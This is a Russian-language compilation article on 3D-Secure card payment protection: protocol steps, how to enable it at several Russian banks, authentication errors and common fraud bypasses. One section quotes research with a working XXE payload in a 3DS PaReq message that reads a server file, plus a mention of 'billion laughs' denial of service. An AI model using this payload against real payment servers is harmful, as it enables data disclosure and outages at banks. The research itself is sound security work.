3d-secure защита в сбербанке

Как это работает?

Главное, что необходимо понять, — это то, что при использовании своей карты (виртуальной или реальной) для онлайн-оплаты, вы сталкиваетесь именно с протоколом 3DS. Поэтому сейчас мы проиллюстрируем все этапы совершения онлайн-платежа.

1 — Покупатель уже добавил все необходимые ему товары в корзину и нажал кнопку «Оплатить». В этот момент он попадает на страницу MPI-сервиса, где вводит данные своей карты.

После нажатия кнопки оплаты продавец (MPI) инициализирует старт платежного потока и, согласно протоколу, отправляет CRReq-запрос (Card Range Request). Данный запрос необходим, чтобы найти банк-эмитент вашей карты и получить CRR из домена взаимодействия. Этот запрос нас мало интересует.

После этого MPI отправляет VeReq (Verification Request). Этот запрос отправляется банку-эмитенту для проверки того, что 3DS для данной карты включен и карту можно использовать для оплаты.

VeRes (Verification Response) содержит дополнительную информацию для следующего этапа платежа.

Клиенты не могут видеть эти два типа сообщений.

2 — MPI создает PaReq (Payment Request) — запрос на оплату. Этот запрос отправляется через редирект в браузере клиента.

Итогом отправки PaReq становится отображение запроса на ввод OTP-кода.

3 — Клиент вводит OTP-код и возвращается на сайт продавца. Опять же в процессе этого через редирект от банка-эмитента к MPI передается PaRes (Payment Response), который содержит информацию о статусе проверки.

Раскрутим XXE

Рассмотрим следующий пример:

<?xml version=”1.0″ encoding=”UTF-8″?><!DOCTYPE ThreeDSecure [<!ENTITY ac SYSTEM “file:///proc/sys/kernel/hostname”>]><ThreeDSecure><Message id=“123-123-123-123-123-123″><PAReq><version>1.0.2</version><Merchant><acqBIN>510069</acqBIN><merID>&ac;</merID><name>MerchantName</name><country>643</country><url>http://asdas.as</url></Merchant><Purchase><xid>U3Vic2NyaWJlX0B3ZWJyMGNr</xid><date>20181004 21:34:21</date><amount>202000</amount><purchAmount>202000</purchAmount><currency>643</currency><exponent>2</exponent><desc>AcquirerName</desc></Purchase><CH><acctID>DYasdVQAOX6as3dfcxccwzPCR6Q74eS5</acctID><expiry>2209</expiry></CH></PAReq></Message></ThreeDSecure>

acqBIN, merID, xid, date, purchAmount и currency отражаются в PaRes. Однако во всех реализациях ACS, которые мы нашли, удалось использовать только merID. Остальные параметры проверяются на соответствие типам данных.

Еще один интересный параметр (и наиболее полезный для атаки) — это URL. Этот параметр не отражается, но и не проверяется. Поэтому его можно использовать для эксплуатации XXE.

Вернемся к нашему примеру. В одной из реализаций ACS мы обнаружили, что можем читать короткие файлы, а также получать ответ в PaRes error через параметр merID. Таким образом, используя PaReq из примера выше, мы получали следующий ответ:

<ThreeDSecure><Message id=” 123-123-123-123-123-123 “><PARes id=” 123-123-123-123-123-123 “><version>1.0.2</version><Merchant><acqBIN>510069</acqBIN><merID>ACS server name</merID></Merchant><Purchase><xid>U3Vic2NyaWJlX0B3ZWJyMGNr</xid><date>20181004 21:34:21</date><purchAmount>202000</purchAmount><currency>643</currency><exponent>2</exponent></Purchase><pan>000000000000000</pan><TX><time>20181004 21:34:21</time><status>U</status></TX><IReq><iReqCode>55</iReqCode><iReqDetail>PAReq.CH.acctID</iReqDetail></IReq></PARes></Message></ThreeDSecure>

Тем не менее в большинстве случаев оставалось только использовать параметр URL для получения DNS или HTTP-запроса к нашему сервису. Другой вектор — это выполнить DOS через XXE-атаку “billion laughs” (проверялось на тестовом сервере).

Как подключить 3d-secure

На сегодняшний день вопрос, как подключить 3d-secure, вводит многих пользователей в некоторое заблуждение. Не во всех банках эта функция входит в пакет услуг по умолчанию, а подключается клиентом самостоятельно, причем, иногда за дополнительную плату. Но в Сбербанке все карты (кроме начальных типов) имеют встроенную технологию, услуга бесплатно включена по умолчанию, ее не нужно активировать и производить какие-то дополнительные действия. При свершении транзакции по интернету, будь это покупка платья или пополнение счета телефона, аутентификация происходит автоматически.

Если вы давно получили карту, и технология не работает, чтобы подключить услугу, нужно прийти в отделение Сбербанка и написать соответствующее заявление.

Что такое 3D-Secure на банковской карте

Многие банки Российской Федерации используют данный тип защиты при расчетах в сети Интернет и подключают услугу автоматически. В некоторых случаях защиту нужно подключать самостоятельно, отправив запрос в банк и активировать автоматическое «SMS-информирование» на выбранный и подтвержденный вами номер.

Рассмотрим детальнее, что такое 3D-Secure на банковской карте и как она работает. Программа была разработана для защиты онлайн-платежей от несанкционированного снятия денежных средств с дебетовой или кредитной карты через Интернет. Банковская карта связана с номером мобильного телефона, на который в случае совершения покупок в Интернете, высылается код подтверждения. Без этого одноразового пароля карта защищена от снятия денег в онлайн-магазине.

Технология 3D-Secure Visa и MasterCard

Благодаря 3D-Secure каждая покупка в онлайн-магазинах в обязательном порядке должна быть подтверждена одноразовым кодом, который высылается на мобильный телефон. Такая система безопасности эффективна для расчетов только на сайтах, поддерживающих данную систему, о чем свидетельствуют соответствующие логотипы. На непроверенных ресурсах, которые не поддерживают сервис, данная программа не работает

Прежде чем совершать покупку, обратите внимание на наличие соответствующих логотипов, которые свидетельствуют о том, что сайт поддерживает безопасный протокол денежных платежей:

  • у платежных систем Visa 3D-Secure называется Verified by Visa;
  • в системе MasterCard 3D-Secure названа MasterCard SecureCode.

Данная технология проста, понятна и предельно эффективна. Применение трех-доменной защиты для каждой транзакции предполагает наличие дополнительной аутентификации владельца карты. Отсюда и появилось в названии 3D, обозначающие три домена защиты, которые участвуют в осуществлении платежа:

При подключенной защите карточки, каждая онлайн-покупка на сайтах, поддерживающих безопасный протокол перевода денег, происходит в несколько этапов, не требует особых знаний и не занимает лишнего времени:

  • выбор товара;
  • заполнение формы для онлайн-оплаты;
  • автоматический переход на защищенную страницу с одновременной отправкой банком SMS с одноразовым паролем;

Что это такое?

Не будем углубляться в технологические нюансы. Для рядового человека, расплачивающегося за покупки в интернете денежными средствами со своей пластиковой карты, достаточно будет наглядного примера.

Недолго думая, добавляете товар в корзину и оформляете платеж:

  • вводите данные по своему адресу;
  • номер карты и срок ее действия;
  • код CVV2 на обратной стороне карточки.

Если сайт поддерживает указанную выше технологию, то вдобавок ко всем уже введенным данным потребуется ввести и пароль 3-D Secure. В противном случае банк отклонит запрос на списание денежных средств, и у вас не получится оплатить выбранную вами позицию.

Причины ошибки “Карта не прошла 3DS-аутентификацию”

Существует несколько основных факторов, которые приводят к появлению оповещения о неудачной транзакции:

  • не подключенная функция;
  • неправильный код;
  • истечение срока годности кода (не более 10 минут);
  • неполадки на линии банка, задержки на сервере;
  • неподдерживаемая платежная система или проблемы с настройкой системы в магазине;
  • Встречаются случаи, когда ошибка появлялась при недостаточной сумме на счету.

Начать нужно с проверки счета, если с этим не возникло проблем, то наиболее простой и оперативный способ решения – позвонить на горячую линию вашего банка. Например, в случае со Сбербанком звоните на 900, либо +7 495 500-55-50. Сотрудник кол-центра проверит настройки и подскажет, как решить проблему и вероятные причины возникновения. Если речь идет не о неполадках со стороны банка или платежной системы, то с помощью оператора решение проблемы займет 5-10 минут. Нет возможности разговаривать по телефону – все современные банковские структуры имеют штат онлайн-консультантов, с которыми можно связаться через форму чата на сайте.

Звонок оператору поддержки – самый оптимальный вариант

Если же вы хотите решить проблему самостоятельно, то начать нужно с проверки подключения функции. Для этого нужно сделать следующее.

  1. Зайти в личный кабинет в банке.
  2. Открыть список имеющихся карт.
  3. Изучить подключенные услуги. Если 3DS аутентификации нет в списке – подключить в режиме онлайн или через оператора.

Для подключения 3DS аутентификации оператор попросит предоставить:

  • ФИО;
  • кодовое слово – заведенное вами при регистрации;
  • 4 цифры в конце номера проблемной карты.

Система трёх доменов

Модель 3-D Secure реализована на основе трёх доменов, в которых происходит порождение и проверка транзакций:

  • домен Эмитента, в составе которого Держатель карты и Банк, выпускающий карты.
  • домен Эквайера, который включает в себя банк-Эквайер и его клиентов (онлайновых торговцев).
  • домен взаимодействия содержит элементы, которые делают возможным проведение транзакций между двумя другими доменами. В его ведении сети и сервисы карточных ассоциаций.

Домены независимы в своих правах и являются важной составной частью процесса передачи информации в общей 3-D Secure-инфраструктуре. Каждому домену определена собственная сфера ответственности в проведении транзакций:

  • В домене эмитента банк-эмитент ответственен за аутентификацию покупателя и предоставление верной информации для проведения транзакции.
  • В домене эквайера онлайновый торговец ответственен за коммерческие отношения с покупателем, а также гарантию того, что покупатель был направлен в верный банк-эмитент для верификации. В этом же домене эквайер несёт ответственность за согласование проведения транзакции через традиционные сети Visa или MasterCard.
  • В домене взаимодействия платежная система Visa или MasterCard ответственна за сохранность информации по каждому эмитенту (банк держателя карты, интернет-адрес эмитента) и предоставление данной информации для вынесения решения в случае конфликтных ситуаций.

Модель 3-D Secure предоставляет стандартный протокол взаимодействия между доменами для обмена и проверки транзакций. Она не вызывает необходимости изменений в отношениях между участниками одного домена:

  • Торговец и Эквайер свободны в выборе любого способа проведения своих транзакций и в управлении отношениями в своих доменах.
  • Эмитенты свободны в выборе любых предпочитаемых ими механизмов для аутентификации держателя карты.

Можно ли обойти систему безопасности

Держатель карты должен понимать, что систем, гарантирующих 100% безопасность средств, не существует. Технология 3D Secure позволяет повысить уровень защиты, но не более. Существуют как минимум 3 способа ее обхода, которыми могут пользоваться мошенники:

  • Заражение телефона и/или ПК держателя карты вирусами. При этом осуществляется банальный перехват сообщений с кодами подтверждения от банка-эмитента и перенаправление их мошенникам.
  • Восстановление СИМ-карты по поддельным документам. Пока человек заметит, что его телефон не работает, обратиться к оператору или в банк может пройти довольно много времени. Мошенники пользуются этим для получения кодов в SMS и кражи средств.
  • Социальная инженерия. Мошенники путем психологических манипуляций убеждают самого держателя сообщить код из SMS по телефону. Они могут говорить, что он нужен для отмены операции, блокировки карточки и т. д., но фактически просто воруют деньги в этот момент.

Еще один немаловажный момент – для магазинов подключение 3D Secure не является обязательным. Многие крупные компании не активируют эту функцию, чтобы сделать процесс оплаты максимально простым для клиентов. Этим успешно пользуются мошенники для воровства средств.

Важно. Если магазин не поддерживает 3D Secure и через него украли деньги мошенники, то по правилам платежных систем он будет обязан компенсировать держателю потери

Оспорить мошенническую операцию, совершенную без ввода 3D Secure, можно через банк-эмитент. Но процесс разбирательства отнимет некоторое время, и в некоторых случаях все же может завершиться не в пользу держателя.

Как получить 3D пароль Россельхозбанка

Держатель банковского пластика Россельхозбанка может получить код (3D- пароль) для подтверждения карточная транзакции несколькими способами.

По SMS

Для получения одноразового пароля в рамках услуги 3D-СМС необходимо:

  • С номера телефона, для которого подключена услуга 3D-СМС отправить на номер +7 903 767 20 90 запрос вида 3DPASSХХХХ, где ХХХХ – четыре последние цифры номера карты, с которой выполняется транзакция.
  • Получить ответное сообщение в котором указывается одноразовый 3D-пароль, дата и время отправки сообщения (генерации пароля), срок действия, четыре последние цифры номера карты для которой он действителен.

Использовать полученный пароль для подтверждения транзакций по другим картам не допускается.

В банкомате

Использование банкоматов или информационно-платежных терминалов многоразовые 3D-пароли с выбранным пользователям сроком действия.

Для выполнения операции необходимо:

  • Вставить пластик в картоприемник и ввести ПИН-код для авторизации.
  • В главном меню банкомата перейти в раздел «Услуги банка» (в терминале – «Другие»).
  • Выбрать пункт «3D-пароль».
  • Из доступных действий выбрать «3D-пароль».
  • Указать необходимый срок действия (выбрать вариант 1 день, 3 дня, 5 дней).
  • Подтвердить операцию вводом ПИН-кода.
  • Получить чек с паролем.

На чеке указывается маскированный (видны 6 первых и 4 последних цифры) номер карты для которой действителен выданный код (невозможно использовать для подтверждения транзакции по другим картам), 3D-пароль (пароль для операций) и его срок действия.

В приложении «Мобильный банк»

В системе дистанционного банковского обслуживания сервисы «Интернет банк» и «Мобильный банк» позволяют сделать пароль для многократного использования при подтверждении карточных транзакций.

Для этого необходимо:

  • В разделе «Карты» выбрать необходимый карточный продукт.
  • Нажать на кнопку «Все действия».
  • Выбрать в появившемся меню ссылку «Получить 3D-пароль».
  • Подтвердить операцию выбранным в системе способом.

В результате в окне приложения будет выведено информационное сообщение с 3D-паролем для расчетов в интернет, сроком его действия и маркированным (видны первые шесть и последние четыре цифры) номером карты, для которой он действителен (для других карт использовать невозможно).

При подключённой услуге 3D-СМС генерация пароля невозможна (ссылка будет неактивной).

  • https://myrouble.ru/3d-secure/
  • https://finbelarus.com/3d-secure-belarusbank/
  • https://rosscards.info/ispolzovanie/rosselhozbank-3d-secure-sms-parol.html
  • https://brobank.ru/chto-takoe-3d-secure/
  • https://mtblog.mtbank.by/tryohstoronnyaya-zashhita-3d-secure-na-strazhe-bezopasnosti-vashih-deneg/
  • https://ibanking.by/3d-secure-belarusbank

Варианты подключения услуги

Если это новая карточка Сбербанка, то защита уже включена. Не надо ничего активировать либо выполнять дополнительные действия. Если карточка не поддерживает защиту, нужно обратиться в банковский филиал, где необходимо составить заявление на активацию услуги. Чтобы не тратить время на поход в банк несколько раз, можно дома с помощью Сбербанка Онлайн или с помощью сотового телефона отправить запрос на перевыпуск карты либо же подключить услугу напрямую.

Через персональный кабинет Сбербанка-Онлайн

Иногда бывают случаи, когда подключить 3DS требуется срочно и времени на поход в банк нет. Вероятно, необходимо что-то срочно купить в магазине. Также определенные интернет-ресурсы иногда принимают платежи лишь с карточек, поддерживающих 3DS. Если необходимо совершить оплату, нужно уточнить, какие карты принимает конкретный сайт. Инструкция, как подключить 3D-Secure Сбербанк через интернет:

  • зайти в Сбербанк Онлайн;
  • затем появится окно с полем, где потребуется набрать полученный до этого пароль и логин. Набрав соответствующую комбинацию нужно нажать «Войти»;
  • после успешного входа открывается окно кабинета. Если в наличие несколько пластиковых карточек от Сбербанка, то из появившегося списка нужно выбрать ту, к которой необходимо подключить защиту. Кликните «Операции по карточке», в появившемся окне отыщите «Подключиться к 3D-Secure». После чего можно производить оплату через СМС-оповещение.

По телефону

Инструкция, как подключить 3D-Secure Сбербанк через телефон:

  • нужно набрать слово «Полный» в поле отправки сообщения на смартфоне;
  • отправить его, указав номер 900;
  • должно прийти сообщение: «Для изменения тарифа на «Полный» карточки «VISA****» отправьте пароль «****»;
  • после ввести полученный пароль;
  • придет СМС с подтверждением активации услуги.

После этого при оплате в онлайн-магазине будет приходить одноразовый SMS-код.

Как подключить 3D-Secure?

Вся суть трех-доменной защиты основана на получении уникального пароля на мобильный номер телефона и дальнейшем введении его для подтверждения оплаты. Поэтому для активации двойной аутентификации при онлайн-платежах необходимо подключить в своем банке услугу «SMS-информирование». Как правило, в банках подключение 3D-Secure возможно двумя способами:

  • можно посетить офис лично и, написав заявление, активировать услугу;
  • или подключить защиту самостоятельно, воспользовавшись специализированными банковскими сервисами для самообслуживания.

Активация защиты банковской карточки занимает минимум времени, а ее эффективность доказана и признана ведущими мировыми платежными системами. Всего несколько простых действий и ваши средства на карте надежно защищены самой современной и высокотехнологичной системой безопасности

Также обратите внимание, что номер мобильного телефона, который указан для отправки одноразового пароля, при необходимости можно сменить. Дополнительно стоит отметить, что рассылка сообщений уникальными паролями в роуминге не работает, поэтому во время путешествий за границей этот фактор нужно учесть.

Далее детально рассмотрим особенности, наиболее удобные варианты и этапы, как подключить 3D-Secure для своей банковской карты на примере Сбербанка и ВТБ 24.

Как подключить 3D-Secure в Сбербанке

Не во всех банках предоставляется данная услуга по защите банковской карточки, но в Сбербанке она абсолютно бесплатная и активируется автоматически без каких-либо требований со стороны клиента. Если у вас совсем новая карта, и еще не активирована защита 3D-Secure, Сбербанк как подключить эту услугу, подскажет в любом своем отделении и выполнит активацию сразу же после обращения. Для того, чтобы проверить, работает ли сервис, достаточно совершить любую мелкую покупку в Интернете или пополнить счет на мобильном телефоне.

Службой безопасности рекомендуется к применению технология 3D-Secure, Сбербанк также напоминает, что нельзя пользоваться услугами сайтов, которые не поддерживают безопасный протокол оплаты при помощи дополнительной аутентификации. Доверять таким ресурсам нельзя и лучше воздержаться от покупок при отсутствии безопасной системы платежей.

Как подключить 3D-Secure в ВТБ 24

В ВТБ 24 3D-Secure подключается автоматически и является абсолютно бесплатной услугой, предоставляемой всем клиентам банка, имеющим карты выпущенные с 12 декабря 2016 года и новее. Всем остальным владельцам банковских карточек защитную функцию необходимо подключать самостоятельно. Есть два способа, как подключить 3D-Secure, ВТБ 24 на своем сайте детально разъясняет поэтапно процедуру активации услуги.

В первом варианте предлагается посетить любое отделение банка и, написав заявление, предоставить номер карты и номер мобильного телефона, которые будут совместно использоваться для аутентификации во время онлайн-платежей.

Второй вариант подключения предусматривает использование сервиса банкомата для самообслуживания. Для этого нужно войти в меню банкомата:

  • выбрать в пункте настроек «3D-Secure»;
  • отыскать пункт меню «Подключение телефона»;
  • далее, воспользовавшись интуитивно-понятным интерфейсом, ввести номер телефона и подтвердить действие.

В ответ на вашу заявку о подключении защитной услуги, банк отправит подтверждающее SMS, в котором будет указано, что услуга для карточки активирована и связана с вашим номером мобильного телефона.

Если возникла необходимость сменить номер телефона, привязанный к карточке, можно его сменить при помощи меню банкомата.  После отправки заявки о смене номера телефона для 3D-Secure, ВТБ отправит вам SMS с уведомлением об изменениях. Это является дополнительной мерой безопасности, и в случае, если вы не вносили изменения, рекомендуется незамедлительно посетить отделение банка и выяснить вопрос.

Как работает 3D Secure?

3D Secure был разработан в свое время платежной системой VISA, назвав дополнительный уровень безопасности VbV. Позже протокол был принят MasterCard и получил MCC. Говоря простым языком, к процедуре аутентификации добавляется еще один дополнительный шаг. Аутентификация основывается на трех доменах, которые не зависят друг от друга. Первым доменом является эквайер — обслуживающий банк или интернет магазин, вторым эмитент – банк, который выпустил данный карточный продукт, а третьим — домен, отвечающей определенной системе платежей.

Многие владельцы пластиков задаются вопросом о необходимости сервиса дополнительной защиты. Отзывы говорят о том, что большинство людей поддерживают ее внедрение.

Так выглядит сообщение о введении пароля для 3D Secure

С каждым годом увеличивается количество интернет ресурсов, принимающих к оплате те карты, которые подключены к одной из современных технологий безопасности. Со временем количество ресурсов будет только расти и возможно не останется магазинов, которые не будут требовать использование технологии.

Услугу можно вовсе и не подключать. Если владелец пластика осуществит свой первый платеж через интернет, ему автоматом будет предложено зарегистрировать карточку в современной программе безопасности. Клиент сможет подключиться к защищенному протоколу уже во время своего первого интернет платежа.

Что из себя представляет технология 3D Secure

Данная технология, позволяющая идентифицировать личность держателя карты, была разработана международными системами MasterCard и Visa. У каждой из обеих компаний существует собственное наименование данной операции.

К примеру:

  • у карточек Виза технология проверки подлинности именуется Verified by Visa;
  • у системы Мастеркард верификация носит название MasterCard SecureCode.

Обе системы аутентификации являются гарантом того, что мошенник не сможет снять деньги со счёта клиента без доступа к его мобильному устройству. Хотя подобные инциденты иногда случаются на торговых ресурсах в интернете, которые пренебрегают технологией 3D Secure и не желают нести дополнительные расходы для безопасности своих клиентов.

Что же собой представляет эта технология, и почему она носит такое название? По замыслу её создателей в данной системе участвуют 3 независимых домена, с которыми и согласовываются все осуществляемые платежи.

Это домены:

  1. Банка-эмитента, изготовившего данную карточку.
  2. Домена данной платёжной системы.
  3. Домена банка, занимающегося обслуживанием онлайн-магазина.

Последовательность проведения платежа проходит следующим образом:

  1. Покупатель выбирает товар на интернет-ресурсе.
  2. При оформлении заказа вводит данные своей платёжной карты для онлайн-оплаты.
  3. Переходит на защищённую страницу и получает подтверждение оплаты с суммой и секретным паролем на свой мобильный номер, привязанный к карточке.
  4. Вводит его в пустое окно и нажимает кнопку «Подтвердить». После этого требуемая сумма списывается с карточки.

Код, полученный из СМС, действует непродолжительное время, и за это время следует успеть его ввести. Если этого не сделать, клиенту придётся запрашивать новый код. Как правило, многие банки применяют данную технологию без ведома пользователя, заботясь о его безопасности. Если пользователь пластика является клиентом банка, который не беспокоится о судьбе его платежей, можно позвонить в офис и уточнить, как стать участником данной системы, либо самостоятельно осуществить эту несложную операцию в любом банкомате.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Adblock
detector